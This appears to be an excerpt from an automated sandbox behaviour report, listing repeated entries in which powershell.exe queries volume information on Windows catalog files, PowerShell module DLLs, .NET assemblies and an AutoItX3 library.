Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0413~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04112~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
